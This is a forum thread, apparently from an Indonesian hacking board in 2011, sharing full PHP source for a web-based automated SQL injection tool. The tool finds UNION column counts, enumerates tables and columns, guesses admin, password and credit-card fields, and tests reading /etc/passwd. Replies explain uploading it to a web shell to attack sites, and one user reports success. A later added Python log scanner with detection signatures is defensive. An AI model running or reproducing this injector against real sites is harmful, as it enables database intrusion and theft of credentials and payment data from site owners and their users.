[PHP] SQL Injector Web Based

Posted: Tue Oct 25, 2011 11:15 pm
by shad.hckr
Originally coded by : [email protected]
Modified by : Xblack

Source code : http://xblack.biz/code.php?id=19

Code:
<html>
<head><title>SQL Injector - Web Version</title>
<style type="text/css">
body{
    background-color: #000;
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
}
input,textarea{
    font-family: courier new;
    font-size:11px;
    color:#FFFFFF;
    background-color: #999999;
    border:1px solid #000000;
}
#form {
    text-align:center;
    background-color:#222;
    padding:5px;
}
#error {
    text-align:center;
    background-color:#cc0000;
    padding:5px;
}
</style>
</head>
<body>

<h3>SQL Injector - Web Version - Darkc0de - Xblack</h3>
<form action="" method="POST">
<div id="form">Url : <input type="text" name="url" size="70"> End : <input type="text" name="end" size="3"><br>
<input type="submit" value="inject"><br><br>
Created by : darkc0de | Modified into web version by <a href="http://xblack.biz">Xblack</a> &copy; 2011</div>
</form>
<pre><?php
set_time_limit(0);
if(isset($_POST['url'])) {
    if(empty($_POST['end'])) {
        $end = "--";
    } else {
        $end = $_POST['end'];
    }   
    injector($_POST['url'],$end);
}

function injector($url,$end) {
        if(!preg_match("/darkc0de/", $url)) {
            print "<div id='error'>[?] Example: http://site.com/index.php?id=darkc0de&pg=news</div>\n";
        } else {
       
        switch($end) {
            case '--' :
            $end = '--';
            break;
            case '/*' :
            $end = '/*';
            break;
            default:
            $end = '--';
            break;
        }
       
        print "[-] URL : $url\n";
        print "[%] Trying connect to host...\n";
        if(con_host($url))
        {
            print "[+] Connect to host successful\n";
            print Get_Info($url);
            print "[-] Finding column number...\n";
            print "[-] Testing : ";
            inject_get_column_num($url, $end);
           
        } else {
            print "[!] Connect to host failed\n";
        }}
}
function inject_get_column_num($url, $end) {

    $max = 100;
    $stop = 0;
   
    $rurl = $url;
   
    for($i = 0; $i <= $max; $i++) {
    $word .= "concat(0x6461726B63306465,0x3a,".str_repeat($i,1).",0x3a),";
    $sql = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($word,",")."+$ending", $url);
    print "$i,";
    if(preg_match("/darkc0de:([0-9]+):/i", con_host($sql), $val)) {
        print "\n[+] Found column number: ".$i."\n";
        print "[+] Null Number: ".$val[1]."\n";
        save_log('injector.txt', "[-] Found column number: ".$i."\r\n");
        save_log('injector.txt', "[-] Null Number: ".$val[1]."\r\n");
       
        for($a = 0; $a <= $i; $a++) {
        $col .= "$a,";
         if($a == $val[1]) {
             $col = str_replace($val[1], "darkc0de", $col);
         }
        }
        $real = str_replace("darkc0de", "1+AND+1=2+UNION+ALL+SELECT+".rtrim($col,",")."+$ending", $rurl);
        print "[+] URL: ".$real."\n";
        save_log('injector.txt', "[+] URL: ".$real."\r\n");
        sql_info($real);
    }
  }
}
function sql_info($url) {
   
    $table_4 = array(
    'tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_user','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','密� ?','aut','author','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images','index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login','login_admin','login_admins','login_user','login_users','logins','logon','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','name','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','用户','obb_profiles','order','orders','parol','partner','partners','passes','password','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwd','pwds','reg_user','reg_users','registered','regu
ser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmin','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user','user_admin','user_info','user_list','user_login','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','username','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCa
tegory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','user_name','jos_user','table_user','email','mail','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins'
    );
   
    $column_4 = array(
'user','username','password','passwd','pass','cc_number','id','email','emri','fjalekalimi','pwd','user_name','customers_email_address','customers_password','user_password','name','user_pass','admin_user','admin_password','admin_pass','usern','user_n','users','login','logins','login_user','login_admin','login_username','user_username','user_login','auid','apwd','adminid','admin_id','adminuser','adminuserid','admin_userid','adminusername','admin_username','adminname','admin_name','usr','usr_n','usrname','usr_name','usrpass','usr_pass','usrnam','nc','uid','userid','user_id','myusername','mail','emni','logohu','punonjes','kpro_user','wp_users','emniplote','perdoruesi','perdorimi','punetoret','logini','llogaria','fjalekalimin','kodi','emer','ime','korisnik','korisnici','user1','administrator','administrator_name','mem_login','login_password','login_pass','login_passwd','login_pwd','sifra','lozinka','psw','pass1word','pass_word','passw','pass_w','user_passwd','userpass','userpassword','userpwd','user_pwd','useradmin','user_admin','mypassword','passwrd','admin_pwd','admin_passwd','mem_password','memlogin','e_mail','usrn','u_name','uname','mempassword','mem_pass','mem_passwd','mem_pwd','p_word','pword','p_assword','myname','my_username','my_name','my_password','my_email','cvvnumber','about','access','accnt','accnts','account','accounts','admin','adminemail','adminlogin','adminmail','admins','aid','aim','auth','authenticate','authentication','blog','cc_expires','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','config','contact','converge_pass_hash','converge_pass_salt','crack','customer','customers','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e-mail','emailaddress','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id_group','id_member','images','index','ip_address','last_ip','last_login','lastname','log','login_name','login_pw','loginkey','loginout','logo',
'md5hash','member','member_id','member_login_key','member_name','memberid','membername','members','new','news','nick','number','nummer','pass_hash','passwordsalt','passwort','personal_key','phone','privacy','pw','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','un','user_email','user_icq','user_ip','user_level','user_passw','user_pw','user_pword','user_pwrd','user_un','user_uname','user_usernm','user_usernun','user_usrnm','userip','userlogin','usernm','userpw','usr2','usrnm','usrs','warez','xar_name','xar_pass'
);
   
    print "[-] Getting sql server information...\n";
    $info = array(
    'User' => 'user()',
    'Database' => 'database()',
    'Version' => 'version()'
    );
   
    $rurl = $url;
    $rurl2 = $url;
    $rurl3 = $url;
   
    $ending = '--';
   
    foreach($info as $get => $val) {
        if(preg_match("/darkc0de:(.*?):darkc0de/", con_host("".str_replace("darkc0de", "".$string."+concat(0x6461726B63306465,0x3a,$val,0x3a,0x6461726B63306465)+", $url).""), $value)) {
            print "[-] $get: $value[1]\n";
            save_log('injector.txt', "[-] $get: $value[1]\r\n");
        }}
        print "[-] Testing load file...\n";
    $load = str_replace("darkc0de", "".$string."load_file(0x2f6574632f706173737764)", $rurl);
    if(preg_match("/root:x:/", con_host($load))) {
        print "[-] w00t w00t, you have permission to load file!\n";
        print "[-] URL: $load\n";
        save_log('injector.txt', "[-] w00t w00t, you have permission to load file!\r\n");
        save_log('injector.txt', "[-] URL: $load\r\n");
    } else {
        print "[-] No permission to load file :( \n";
    }
            if(preg_match("/darkc0de:5.(.*?):darkc0de/", con_host("".str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,version(),0x3a,0x6461726B63306465)", $url).""), $value)) {
                print "[-] MySQL Server version is : 5.x\n";
                print "[-] Start extract the column and table...\n";
                print "[-] Table : Column\n";
                $url = str_replace("darkc0de", "concat(char(88,98,108,97,99,107,58),count(table_name),char(58,88,98,108,97,99,107))", $url);
                //$url = str_replace($ending, "+from+information_schema.tables+where+table_schema=database()+$ending", $url);
                $url = "$url+from+information_schema.tables+where+table_schema=database()$ending";
                if(preg_match("/Xblack:([0-9]+):Xblack/", con_host($url), $totaltbl)) {
                   print "[+] Total Table Found: ".$totaltbl[1]."\n";
                   save_log('injector.txt', "[+] Total Table Found: ".$totaltbl[1]."\r\n");
                   for($i = 0; $i <= $totaltbl[1]; $i++) {
                  $urlxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),table_name,char(58,88,98,108,97,99,107))",$rurl2);
                  $urlxx = $urlxx."from+information_schema.tables+where+table_schema=database()+limit+".$i.",1+$ending";
                  if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxx), $table_name)) {
                      print "[-] Table: ".$table_name[1]."\n";
                      save_log('injector.txt', "[-] Table: ".$table_name[1]."\r\n");
                    $urlxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),count(column_name),char(58,88,98,108,97,99,107))",$rurl2);
                    $urlxxx = $urlxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+$ending";
                      if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxx), $totalclm)) {
                          print "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\n";
                          save_log('injector.txt', "[+] Total Column in ".$table_name[1].": ".$totalclm[1]."\r\n");
                          for($a = 0; $a <= $totalclm[1]; $a++) {
                            $urlxxxx = str_replace("darkc0de","concat(char(88,98,108,97,99,107,58),column_name,char(58,88,98,108,97,99,107))",$rurl3);
                            $urlxxxx = $urlxxxx."from+information_schema.columns+where+table_name=0x".HexValue($table_name[1])."+limit+".$a.",1+$ending";
                              if(preg_match("/Xblack:(.*?):Xblack/", con_host($urlxxxx), $column_name)) {
                                  print "".$column_name[1].",";
                                  save_log('injector.txt', "".$column_name[1].",");
                             }
                          }
                          print "\n";
                          save_log('injector.txt', "\r\n");
                      }
                  }
                   }
                   
                }

            } else {
                print "[-] MySQL Server version is : 4.x\n";
                print "[-] Start automatic column and table finder...\n";
                print "[-] This may take a few minutes or hours to finish\n";
                foreach($table_4 as $table) {
                    $i++;
                    $url = str_replace("concat(0x696E6A336374)", "concat(0x6461726B63306465)", $rurl);
                    $url = str_replace($ending, "+from+".$table."+$ending", $url);
                    if(preg_match("/darkc0de/", con_host($url))) {
                        print "[$i] Found Table : $table\n";
                        save_log('injector.txt', "[-] Found Table : $table\r\n");
                        print "[-] Finding column...\n";
                         foreach($column_4 as $column) {
                             $url = str_replace("darkc0de", "concat(0x6461726B63306465,0x3a,$column,0x3a,0x6461726B63306465)", $rurl);
                            $url = str_replace("$ending", "+from+".$table."+$ending", $url);
                            if(preg_match("/darkc0de:(.*?):darkc0de/", con_host($url))) {
                                print "[-] Found column: $column\n";
                                save_log('injector.txt', "[-] Found column: $column\r\n");
                            }
                         }
                         save_log('injector.txt', "\r\n");
                         print "[-] Done searching column inside $table table\n";
                       
                    }
                }
            }
    print "[-] Done\n";
    print "[-] See 'injector.txt' to see the log\n";
    exit;
}
function HexValue($text) {
     for($i = 0; $i < strlen($text); $i++) {
         $a .= dechex(ord($text[$i]));
     }
     return $a;
}
function Get_Info($site) {
    if($info = con_host($site)) {
        preg_match("/Content-Type:(.+)/", $info, $type);
        preg_match("/Server:(.+)/", $info, $server);
        print "[-] $type[0]\n";
        print "[-] $server[0]\n";
        $ip = parse_url($site);
        print "[-] IP: ".gethostbyname($ip['host'])."\n";
    }
}
function con_host($host) {
    $ch = curl_init($host);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 200);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_COOKIEFILE, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_COOKIEJAR, "google_cookies.txt");
    curl_setopt($ch, CURLOPT_REFERER, "http://google.com");
    curl_setopt($ch, CURLOPT_USERAGENT, 'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54');
   
    $pg = curl_exec($ch);
    if($pg){
        return $pg;
    } else {
        return false;
    }
}
function save_log($fname = '', $text = '') {
    $file = @fopen(dirname(__FILE__).'/'.$fname.'', 'a');
    $write = @fwrite($file, $text, '60000000');
    if($write) {
        return 1;
    } else {
        return 0;
    }
}?>
</body>
</html>
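
The script above sends fixed, recognisable strings with every request, which makes it easy to spot in web server logs. The following is an added example, not part of the original post: it scans combined-format access logs for the markers hard-coded in the PHP source. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# URL fingerprints copied from the PHP source in the post above.
URL_SIGNATURES = {
    "marker_hex": re.compile(r"0x6461726b63306465", re.I),              # hex("darkc0de")
    "marker_char": re.compile(r"char\(88,98,108,97,99,107,58\)", re.I),  # "Xblack:"
    "union_probe": re.compile(r"\band\s+1=2\s+union\s+all\s+select\b", re.I),
    "load_file_passwd": re.compile(r"load_file\(0x2f6574632f706173737764\)", re.I),
    "schema_enum": re.compile(r"\bfrom\s+information_schema\.(tables|columns)\b", re.I),
}
# Header values hard-coded in con_host(); weak on their own, so only used as corroboration.
TOOL_USER_AGENT = ("Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; "
                   "Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54")
TOOL_REFERER = "http://google.com"

# Apache/nginx "combined" log format (assumed log layout).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')

def classify(line):
    """Return (client_ip, set_of_signature_names) or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote_plus(m["target"])  # '+' and %xx are decoded before matching
    hits = {name for name, rx in URL_SIGNATURES.items() if rx.search(target)}
    if not hits:
        return None  # headers alone are not enough to flag a client
    if m["ua"] == TOOL_USER_AGENT:
        hits.add("tool_user_agent")
    if m["referer"] == TOOL_REFERER:
        hits.add("tool_referer")
    return m["ip"], hits

def scan(lines):
    """Aggregate matched signatures per client IP."""
    report = {}
    for line in lines:
        result = classify(line)
        if result:
            report.setdefault(result[0], set()).update(result[1])
    return report

# Constructed sample log: two requests shaped like the script's output, one benign.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Oct/2011:23:20:01 +0000] "GET /index.php?id=1+AND+1=2+UNION+ALL+'
    'SELECT+concat(0x6461726B63306465,0x3a,0,0x3a)+-- HTTP/1.1" 200 512 '
    f'"{TOOL_REFERER}" "{TOOL_USER_AGENT}"',
    '203.0.113.7 - - [25/Oct/2011:23:20:09 +0000] "GET /index.php?id=1+AND+1=2+UNION+ALL+'
    'SELECT+concat(char(88,98,108,97,99,107,58),table_name,char(58,88,98,108,97,99,107))'
    'from+information_schema.tables+where+table_schema=database()+limit+0,1+-- HTTP/1.1" '
    f'200 530 "{TOOL_REFERER}" "{TOOL_USER_AGENT}"',
    '198.51.100.20 - - [25/Oct/2011:23:21:00 +0000] "GET /index.php?id=42 HTTP/1.1" '
    f'200 2048 "{TOOL_REFERER}" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

The same strings can be used as WAF or IDS content matches. The underlying fix on the application side remains parameterized queries.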

Re: [PHP] SQL Injector Web Based

Posted: Wed Oct 26, 2011 12:23 am
by NoThee
Bro, I want to ask how to use that code. What do I do with it? I'm confused; I often see PHP code like that but don't know what I'm supposed to do with it...?
Please answer... sorry, newbie

Re: [PHP] SQL Injector Web Based

Posted: Wed Oct 26, 2011 12:39 am
by shad.hckr
1. Save the code above with a .php extension (ex: sqli.php)
2. Upload it to a web/shell
3. Open it in a browser.
4. Enter the link you want to inject (ex: http://domain.com/file.php?var=darkc0de)

Re: [PHP] SQL Injector Web Based

Posted: Wed Oct 26, 2011 12:49 am
by NoThee
How do I upload it to a web/shell...?

Re: [PHP] SQL Injector Web Based

Posted: Wed Oct 26, 2011 5:07 am
by shad.hckr
NoThee wrote: How do I upload it to a web/shell...?

Look in the other threads, there are plenty of tutorials.

Re: [PHP] SQL Injector Web Based

Posted: Wed Oct 26, 2011 5:20 am
by poni
Cool, Mr. shad

Re: [PHP] SQL Injector Web Based

Posted: Wed Oct 26, 2011 7:29 am
by Digital Cat
Top notch..

Permission to copy the code, okay..

:D If anyone has already uploaded it..

share the link, okay..

I'm in PW right now, PW = Posisi wenak (comfy position).

Re: [PHP] SQL Injector Web Based

Posted: Fri Nov 11, 2011 1:38 am
by yuanryuzaki
I've tried it, bro... and it was successfully uploaded to the web :D

Re: [PHP] SQL Injector Web Based

Posted: Mon Jan 02, 2012 11:06 pm
by oramelu2
Can it be run, and does it work as it should, bro?

Re: [PHP] SQL Injector Web Based

Posted: Thu Jan 05, 2012 8:15 am
by googlegirl
Sorry, brothers.. I'm new to this... how do I use this sql, and where can I download sql injection??